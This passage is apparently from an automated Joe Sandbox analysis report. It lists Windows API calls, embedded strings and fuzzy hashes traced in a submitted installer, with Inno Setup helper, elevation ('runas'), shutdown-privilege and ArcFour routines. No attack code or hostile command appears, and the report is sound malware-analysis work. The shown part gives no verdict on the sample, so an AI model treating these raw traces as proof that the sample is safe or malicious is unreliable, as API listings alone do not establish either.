                                                                          • Associated: 00000001.00000002.3303475518.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303509140.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303552809.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: c6c06974965794d864392915e7a6b680c3d3b0c6831c6a02358c4469e8de6b1c
                                                                          • Instruction ID: 72cb28a769613da0e12d57a8c8ff31d21ec4f608c404a89b028e4eccd5103e64
                                                                          • Opcode Fuzzy Hash: c6c06974965794d864392915e7a6b680c3d3b0c6831c6a02358c4469e8de6b1c
                                                                          • Instruction Fuzzy Hash: 87518570E041459FEB01EFA9C482AAEBBF5EB49304F51817BE500E7351DB389D46CB98
                                                                          APIs
                                                                          • VirtualAlloc.KERNEL32(00000000,00001000,00001000,00000040,?,00000000,0041EDB4,?,0042389F,00423C1C,0041EDB4), ref: 0041F3F2
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.3303252633.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303434785.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303475518.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303509140.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303552809.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: AllocVirtual
                                                                          • String ID:
                                                                          • API String ID: 4275171209-0
                                                                          • Opcode ID: 25741e919397043df0620f3a34db4bcef4e36b6359be59aa132e91d838a2cc50
                                                                          • Instruction ID: b55a7b9a32de56e4c0cdb05f5aaeda5055a0700d8eb896d56cc2d0e0b2117302
                                                                          • Opcode Fuzzy Hash: 25741e919397043df0620f3a34db4bcef4e36b6359be59aa132e91d838a2cc50
                                                                          • Instruction Fuzzy Hash: F01148742007069BC710DF19C880B86FBE4EB98390B14C53BE9988B385D374E8598BA9
                                                                          APIs
                                                                          • GetLastError.KERNEL32(00000000,0045268D), ref: 0045266F
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.3303252633.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303434785.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303475518.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303509140.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303552809.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorLast
                                                                          • String ID:
                                                                          • API String ID: 1452528299-0
                                                                          • Opcode ID: 6f78eaee849ee638804850479d3cdbdf5400ab5c1e67a59323e7cfb7155a44e8
                                                                          • Instruction ID: 0a85f8cb76b48f87276e85e1927624e59cb24adfaf40460ac6081df001af0a23
                                                                          • Opcode Fuzzy Hash: 6f78eaee849ee638804850479d3cdbdf5400ab5c1e67a59323e7cfb7155a44e8
                                                                          • Instruction Fuzzy Hash: BD0170356046446F8B10DF699C404EEF7F8DB4A3207208277FC64D3352DB745D099664
                                                                          APIs
                                                                          • VirtualFree.KERNEL32(?,?,00004000,?,?,?,?,?,00401973), ref: 00401766
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.3303252633.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303434785.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303475518.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303509140.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303552809.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: FreeVirtual
                                                                          • String ID:
                                                                          • API String ID: 1263568516-0
                                                                          • Opcode ID: 827a1b883538dfed4e56bd6d9186317dde9c02c408e4bc47c040c509ac29fb8c
                                                                          • Instruction ID: 2f1b12c935ae24389c3dd8db424781fbbcf1746defe36878ea7ad6421184be39
                                                                          • Opcode Fuzzy Hash: 827a1b883538dfed4e56bd6d9186317dde9c02c408e4bc47c040c509ac29fb8c
                                                                          • Instruction Fuzzy Hash: 0C0170766043108FC3109F29DCC4E2677E8D780378F05413EDA84673A0D37A6C0187D9
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.3303252633.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303434785.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303475518.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303509140.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303552809.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: CloseHandle
                                                                          • String ID:
                                                                          • API String ID: 2962429428-0
                                                                          • Opcode ID: 8a7e85c26bba006a24699feaad57dd478220a7a6e3331b9edb59fbcda9639b9f
                                                                          • Instruction ID: 073c3129693101c5e7833b7ffa09eca8aa7a1e81ff9bb2ce6bcaaab03392c7d4
                                                                          • Opcode Fuzzy Hash: 8a7e85c26bba006a24699feaad57dd478220a7a6e3331b9edb59fbcda9639b9f
                                                                          • Instruction Fuzzy Hash:
                                                                          APIs
                                                                            • Part of subcall function 0044AE58: GetVersionExA.KERNEL32(00000094), ref: 0044AE75
                                                                          • LoadLibraryA.KERNEL32(uxtheme.dll,?,0044EFC9,004970B6), ref: 0044AED3
                                                                          • GetProcAddress.KERNEL32(00000000,OpenThemeData), ref: 0044AEEB
                                                                          • GetProcAddress.KERNEL32(00000000,CloseThemeData), ref: 0044AEFD
                                                                          • GetProcAddress.KERNEL32(00000000,DrawThemeBackground), ref: 0044AF0F
                                                                          • GetProcAddress.KERNEL32(00000000,DrawThemeText), ref: 0044AF21
                                                                          • GetProcAddress.KERNEL32(00000000,GetThemeBackgroundContentRect), ref: 0044AF33
                                                                          • GetProcAddress.KERNEL32(00000000,GetThemeBackgroundContentRect), ref: 0044AF45
                                                                          • GetProcAddress.KERNEL32(00000000,GetThemePartSize), ref: 0044AF57
                                                                          • GetProcAddress.KERNEL32(00000000,GetThemeTextExtent), ref: 0044AF69
                                                                          • GetProcAddress.KERNEL32(00000000,GetThemeTextMetrics), ref: 0044AF7B
                                                                          • GetProcAddress.KERNEL32(00000000,GetThemeBackgroundRegion), ref: 0044AF8D
                                                                          • GetProcAddress.KERNEL32(00000000,HitTestThemeBackground), ref: 0044AF9F
                                                                          • GetProcAddress.KERNEL32(00000000,DrawThemeEdge), ref: 0044AFB1
                                                                          • GetProcAddress.KERNEL32(00000000,DrawThemeIcon), ref: 0044AFC3
                                                                          • GetProcAddress.KERNEL32(00000000,IsThemePartDefined), ref: 0044AFD5
                                                                          • GetProcAddress.KERNEL32(00000000,IsThemeBackgroundPartiallyTransparent), ref: 0044AFE7
                                                                          • GetProcAddress.KERNEL32(00000000,GetThemeColor), ref: 0044AFF9
                                                                          • GetProcAddress.KERNEL32(00000000,GetThemeMetric), ref: 0044B00B
                                                                          • GetProcAddress.KERNEL32(00000000,GetThemeString), ref: 0044B01D
                                                                          • GetProcAddress.KERNEL32(00000000,GetThemeBool), ref: 0044B02F
                                                                          • GetProcAddress.KERNEL32(00000000,GetThemeInt), ref: 0044B041
                                                                          • GetProcAddress.KERNEL32(00000000,GetThemeEnumValue), ref: 0044B053
                                                                          • GetProcAddress.KERNEL32(00000000,GetThemePosition), ref: 0044B065
                                                                          • GetProcAddress.KERNEL32(00000000,GetThemeFont), ref: 0044B077
                                                                          • GetProcAddress.KERNEL32(00000000,GetThemeRect), ref: 0044B089
                                                                          • GetProcAddress.KERNEL32(00000000,GetThemeMargins), ref: 0044B09B
                                                                          • GetProcAddress.KERNEL32(00000000,GetThemeIntList), ref: 0044B0AD
                                                                          • GetProcAddress.KERNEL32(00000000,GetThemePropertyOrigin), ref: 0044B0BF
                                                                          • GetProcAddress.KERNEL32(00000000,SetWindowTheme), ref: 0044B0D1
                                                                          • GetProcAddress.KERNEL32(00000000,GetThemeFilename), ref: 0044B0E3
                                                                          • GetProcAddress.KERNEL32(00000000,GetThemeSysColor), ref: 0044B0F5
                                                                          • GetProcAddress.KERNEL32(00000000,GetThemeSysColorBrush), ref: 0044B107
                                                                          • GetProcAddress.KERNEL32(00000000,GetThemeSysBool), ref: 0044B119
                                                                          • GetProcAddress.KERNEL32(00000000,GetThemeSysSize), ref: 0044B12B
                                                                          • GetProcAddress.KERNEL32(00000000,GetThemeSysFont), ref: 0044B13D
                                                                          • GetProcAddress.KERNEL32(00000000,GetThemeSysString), ref: 0044B14F
                                                                          • GetProcAddress.KERNEL32(00000000,GetThemeSysInt), ref: 0044B161
                                                                          • GetProcAddress.KERNEL32(00000000,IsThemeActive), ref: 0044B173
                                                                          • GetProcAddress.KERNEL32(00000000,IsAppThemed), ref: 0044B185
                                                                          • GetProcAddress.KERNEL32(00000000,GetWindowTheme), ref: 0044B197
                                                                          • GetProcAddress.KERNEL32(00000000,EnableThemeDialogTexture), ref: 0044B1A9
                                                                          • GetProcAddress.KERNEL32(00000000,IsThemeDialogTextureEnabled), ref: 0044B1BB
                                                                          • GetProcAddress.KERNEL32(00000000,GetThemeAppProperties), ref: 0044B1CD
                                                                          • GetProcAddress.KERNEL32(00000000,SetThemeAppProperties), ref: 0044B1DF
                                                                          • GetProcAddress.KERNEL32(00000000,GetCurrentThemeName), ref: 0044B1F1
                                                                          • GetProcAddress.KERNEL32(00000000,GetThemeDocumentationProperty), ref: 0044B203
                                                                          • GetProcAddress.KERNEL32(00000000,DrawThemeParentBackground), ref: 0044B215
                                                                          • GetProcAddress.KERNEL32(00000000,EnableTheming), ref: 0044B227
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.3303252633.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303434785.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303475518.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303509140.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303552809.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: AddressProc$LibraryLoadVersion
                                                                          • String ID: CloseThemeData$DrawThemeBackground$DrawThemeEdge$DrawThemeIcon$DrawThemeParentBackground$DrawThemeText$EnableThemeDialogTexture$EnableTheming$GetCurrentThemeName$GetThemeAppProperties$GetThemeBackgroundContentRect$GetThemeBackgroundRegion$GetThemeBool$GetThemeColor$GetThemeDocumentationProperty$GetThemeEnumValue$GetThemeFilename$GetThemeFont$GetThemeInt$GetThemeIntList$GetThemeMargins$GetThemeMetric$GetThemePartSize$GetThemePosition$GetThemePropertyOrigin$GetThemeRect$GetThemeString$GetThemeSysBool$GetThemeSysColor$GetThemeSysColorBrush$GetThemeSysFont$GetThemeSysInt$GetThemeSysSize$GetThemeSysString$GetThemeTextExtent$GetThemeTextMetrics$GetWindowTheme$HitTestThemeBackground$IsAppThemed$IsThemeActive$IsThemeBackgroundPartiallyTransparent$IsThemeDialogTextureEnabled$IsThemePartDefined$OpenThemeData$SetThemeAppProperties$SetWindowTheme$uxtheme.dll
                                                                          • API String ID: 1968650500-2910565190
                                                                          • Opcode ID: 58a82c8a34365b473289e4af6432c949e3c28b1c5dfbf877b155a0c5010eab07
                                                                          • Instruction ID: a412a743d8d6f7d45af61582fe4c6e78a33dc70606a22357c48ac29c98de50d6
                                                                          • Opcode Fuzzy Hash: 58a82c8a34365b473289e4af6432c949e3c28b1c5dfbf877b155a0c5010eab07
                                                                          • Instruction Fuzzy Hash: 5991C9B0640B50EBEF00EFF598C6A2A36A8EB15B14714457BB444EF295D778C814CF9E
                                                                          APIs
                                                                          • GetTickCount.KERNEL32 ref: 00457D4F
                                                                          • QueryPerformanceCounter.KERNEL32(02333858,00000000,00457FE2,?,?,02333858,00000000,?,004586DE,?,02333858,00000000), ref: 00457D58
                                                                          • GetSystemTimeAsFileTime.KERNEL32(02333858,02333858), ref: 00457D62
                                                                          • GetCurrentProcessId.KERNEL32(?,02333858,00000000,00457FE2,?,?,02333858,00000000,?,004586DE,?,02333858,00000000), ref: 00457D6B
                                                                          • CreateNamedPipeA.KERNEL32(00000000,40080003,00000006,00000001,00002000,00002000,00000000,00000000), ref: 00457DE1
                                                                          • GetLastError.KERNEL32(00000000,40080003,00000006,00000001,00002000,00002000,00000000,00000000,?,02333858,02333858), ref: 00457DEF
                                                                          • CreateFileA.KERNEL32(00000000,C0000000,00000000,00498AF0,00000003,00000000,00000000,00000000,00457F9E), ref: 00457E37
                                                                          • SetNamedPipeHandleState.KERNEL32(000000FF,00000002,00000000,00000000,00000000,00457F8D,?,00000000,C0000000,00000000,00498AF0,00000003,00000000,00000000,00000000,00457F9E), ref: 00457E70
                                                                            • Part of subcall function 0042D890: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0042D8A3
                                                                          • CreateProcessA.KERNEL32(00000000,00000000,?,00000000,00000000,00000001,0C000000,00000000,00000000,00000044,?,000000FF,00000002,00000000,00000000,00000000), ref: 00457F19
                                                                          • CloseHandle.KERNEL32(?,00000000,00000000,?,00000000,00000000,00000001,0C000000,00000000,00000000,00000044,?,000000FF,00000002,00000000,00000000), ref: 00457F4F
                                                                          • CloseHandle.KERNEL32(000000FF,00457F94,?,00000000,00000000,00000001,0C000000,00000000,00000000,00000044,?,000000FF,00000002,00000000,00000000,00000000), ref: 00457F87
                                                                            • Part of subcall function 00452AFC: GetLastError.KERNEL32(00000000,0045356D,00000005,00000000,004535A2,?,?,00000000,0049A628,00000004,00000000,00000000,00000000,?,00496869,00000000), ref: 00452AFF
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.3303252633.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303434785.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303475518.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303509140.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303552809.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: CreateHandle$CloseErrorFileLastNamedPipeProcessSystemTime$CountCounterCurrentDirectoryPerformanceQueryStateTick
                                                                          • String ID: 64-bit helper EXE wasn't extracted$Cannot utilize 64-bit features on this version of Windows$CreateFile$CreateNamedPipe$CreateProcess$D$Helper process PID: %u$SetNamedPipeHandleState$Starting 64-bit helper process.$\\.\pipe\InnoSetup64BitHelper-%.8x-%.8x-%.8x-%.8x%.8x$helper %d 0x%x$i
                                                                          • API String ID: 770386003-3271284199
                                                                          • Opcode ID: 9bc676f9c34af54fa9c79b55e27a3e393b90950002bff594f479ab37992d8959
                                                                          • Instruction ID: c70edaa48864fe3754a193870ded2551bb9409a03b77fa183b8e4c23b8ad21c8
                                                                          • Opcode Fuzzy Hash: 9bc676f9c34af54fa9c79b55e27a3e393b90950002bff594f479ab37992d8959
                                                                          • Instruction Fuzzy Hash: 66712270A043449EDB10DB69DC45B9EBBF5AB05705F1084BAF908FB283DB7859488F69
                                                                          APIs
                                                                            • Part of subcall function 00476E18: GetModuleHandleA.KERNEL32(kernel32.dll,GetFinalPathNameByHandleA,02332BDC,?,?,?,02332BDC,00476FDC,00000000,004770FA,?,?,-00000010,?), ref: 00476E31
                                                                            • Part of subcall function 00476E18: GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00476E37
                                                                            • Part of subcall function 00476E18: GetFileAttributesA.KERNEL32(00000000,00000000,kernel32.dll,GetFinalPathNameByHandleA,02332BDC,?,?,?,02332BDC,00476FDC,00000000,004770FA,?,?,-00000010,?), ref: 00476E4A
                                                                            • Part of subcall function 00476E18: CreateFileA.KERNEL32(00000000,00000000,00000007,00000000,00000003,00000000,00000000,00000000,00000000,kernel32.dll,GetFinalPathNameByHandleA,02332BDC,?,?,?,02332BDC), ref: 00476E74
                                                                            • Part of subcall function 00476E18: CloseHandle.KERNEL32(00000000,?,?,?,02332BDC,00476FDC,00000000,004770FA,?,?,-00000010,?), ref: 00476E92
                                                                            • Part of subcall function 00476EF0: GetCurrentDirectoryA.KERNEL32(00000104,?,00000000,00476F82,?,?,?,02332BDC,?,00476FE4,00000000,004770FA,?,?,-00000010,?), ref: 00476F20
                                                                          • ShellExecuteEx.SHELL32(0000003C), ref: 00477034
                                                                          • GetLastError.KERNEL32(00000000,004770FA,?,?,-00000010,?), ref: 0047703D
                                                                          • MsgWaitForMultipleObjects.USER32(00000001,00000000,00000000,000000FF,000000FF), ref: 0047708A
                                                                          • GetExitCodeProcess.KERNEL32(00000000,00000000), ref: 004770AE
                                                                          • CloseHandle.KERNEL32(00000000,004770DF,00000000,00000000,000000FF,000000FF,00000000,004770D8,?,00000000,004770FA,?,?,-00000010,?), ref: 004770D2
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.3303252633.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303434785.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303475518.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303509140.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303552809.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: Handle$CloseFile$AddressAttributesCodeCreateCurrentDirectoryErrorExecuteExitLastModuleMultipleObjectsProcProcessShellWait
                                                                          • String ID: <$GetExitCodeProcess$MsgWaitForMultipleObjects$ShellExecuteEx$ShellExecuteEx returned hProcess=0$runas
                                                                          • API String ID: 883996979-221126205
                                                                          • Opcode ID: cdfc9ed65273480b993f908da37bc8b157bd69d2ac5039e997c7e7ab6857fd80
                                                                          • Instruction ID: 1ba95e0e0868ac7cc54db30065146fef24764d75c8f79a60f30d4c8031701125
                                                                          • Opcode Fuzzy Hash: cdfc9ed65273480b993f908da37bc8b157bd69d2ac5039e997c7e7ab6857fd80
                                                                          • Instruction Fuzzy Hash: 6F3162B0A04648AADB10EFAAC841ADEB7B9EF05314F90843BF508F7382D77C59048B59
                                                                          APIs
                                                                          • SendMessageA.USER32(00000000,00000223,00000000,00000000), ref: 00422A04
                                                                          • ShowWindow.USER32(00000000,00000003,00000000,00000223,00000000,00000000,00000000,00422BCE), ref: 00422A14
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.3303252633.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303434785.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303475518.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303509140.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303552809.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: MessageSendShowWindow
                                                                          • String ID:
                                                                          • API String ID: 1631623395-0
                                                                          • Opcode ID: 2c26266a8c67d7a7ed143539e2fbf203b7c134ad6664bcde8bffe5e01bbb34f6
                                                                          • Instruction ID: 39dda2673d0f757005a7c2ebbeab04d2226afc2b16c541db07efabb99d57c27a
                                                                          • Opcode Fuzzy Hash: 2c26266a8c67d7a7ed143539e2fbf203b7c134ad6664bcde8bffe5e01bbb34f6
                                                                          • Instruction Fuzzy Hash: 8B916171B04214BFD710EFA9DA86F9D77F4AB04314F5500B6F904AB3A2CB78AE409B58
                                                                          APIs
                                                                          • IsIconic.USER32(?), ref: 004183A3
                                                                          • GetWindowPlacement.USER32(?,0000002C), ref: 004183C0
                                                                          • GetWindowRect.USER32(?), ref: 004183DC
                                                                          • GetWindowLongA.USER32(?,000000F0), ref: 004183EA
                                                                          • GetWindowLongA.USER32(?,000000F8), ref: 004183FF
                                                                          • ScreenToClient.USER32(00000000), ref: 00418408
                                                                          • ScreenToClient.USER32(00000000,?), ref: 00418413
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.3303252633.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303434785.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303475518.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303509140.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303552809.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: Window$ClientLongScreen$IconicPlacementRect
                                                                          • String ID: ,
                                                                          • API String ID: 2266315723-3772416878
                                                                          • Opcode ID: bc370706f242ec70077bf36f1e1d3e6d0ab536e6ab9c2c39735764bf232ebbb5
                                                                          • Instruction ID: f1655e9c1aaa1f9d3e17845697c0dfec8ab0781743990dff6cd0a114faef5a7c
                                                                          • Opcode Fuzzy Hash: bc370706f242ec70077bf36f1e1d3e6d0ab536e6ab9c2c39735764bf232ebbb5
                                                                          • Instruction Fuzzy Hash: D6112B71505201AFDB00EF69C885F9B77E8AF49314F18067EBD58DB286D738D900CBA9
                                                                          APIs
                                                                          • GetCurrentProcess.KERNEL32(00000028), ref: 00454B0F
                                                                          • OpenProcessToken.ADVAPI32(00000000,00000028), ref: 00454B15
                                                                          • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,00000028), ref: 00454B2E
                                                                          • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000002,00000000,00000000,00000000), ref: 00454B55
                                                                          • GetLastError.KERNEL32(?,00000000,00000002,00000000,00000000,00000000), ref: 00454B5A
                                                                          • ExitWindowsEx.USER32(00000002,00000000), ref: 00454B6B
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.3303252633.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303434785.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303475518.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303509140.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303552809.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: ProcessToken$AdjustCurrentErrorExitLastLookupOpenPrivilegePrivilegesValueWindows
                                                                          • String ID: SeShutdownPrivilege
                                                                          • API String ID: 107509674-3733053543
                                                                          • Opcode ID: 4672a8203829a771e5d00f2c17f761bc323a5d0378d5eda1ad4e77e08b45408c
                                                                          • Instruction ID: 73069b54807863efa740a64668e3ddc19e7753e901194602af91027a354c2964
                                                                          • Opcode Fuzzy Hash: 4672a8203829a771e5d00f2c17f761bc323a5d0378d5eda1ad4e77e08b45408c
                                                                          • Instruction Fuzzy Hash: FDF0687068430275E610AA758C07F2B21989784B5DF50492EBE45EE1C3D7BCD44C8A6E
                                                                          APIs
                                                                          • GetProcAddress.KERNEL32(10000000,ISCryptGetVersion), ref: 0045C8B1
                                                                          • GetProcAddress.KERNEL32(10000000,ArcFourInit), ref: 0045C8C1
                                                                          • GetProcAddress.KERNEL32(10000000,ArcFourCrypt), ref: 0045C8D1
                                                                          • ISCryptGetVersion._ISCRYPT(10000000,ArcFourCrypt,10000000,ArcFourInit,10000000,ISCryptGetVersion,?,0047DFC7,00000000,0047DFF0), ref: 0045C8F6
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.3303252633.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303434785.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303475518.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303509140.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303552809.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: AddressProc$CryptVersion
                                                                          • String ID: ArcFourCrypt$ArcFourInit$ISCryptGetVersion
                                                                          • API String ID: 1951258720-508647305
                                                                          • Opcode ID: 7e27a9db68ce5781c7a285243bc6d328b0b1bffa5381604cafab58ca7bab5c59
                                                                          • Instruction ID: b92a23805cb6ee5c0910e5f81ef8443a356b34338ef2df7ef9b51b6282c91381
                                                                          • Opcode Fuzzy Hash: 7e27a9db68ce5781c7a285243bc6d328b0b1bffa5381604cafab58ca7bab5c59
                                                                          • Instruction Fuzzy Hash: 87F049F0901700DEDB14DF76BEC633B7695E7A8316F18803BA619A51A2D738044CCA5C
                                                                          APIs
                                                                          • FindFirstFileA.KERNEL32(00000000,?,00000000,004966A6,?,?,00000000,0049A628,?,00496830,00000000,00496884,?,?,00000000,0049A628), ref: 004965BF
                                                                          • SetFileAttributesA.KERNEL32(00000000,00000010), ref: 00496642
                                                                          • FindNextFileA.KERNEL32(000000FF,?,00000000,0049667E,?,00000000,?,00000000,004966A6,?,?,00000000,0049A628,?,00496830,00000000), ref: 0049665A
                                                                          • FindClose.KERNEL32(000000FF,00496685,0049667E,?,00000000,?,00000000,004966A6,?,?,00000000,0049A628,?,00496830,00000000,00496884), ref: 00496678
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.3303252633.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303434785.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303475518.0000000000499000.00000008.00000001.01000000.00000004.sdmp
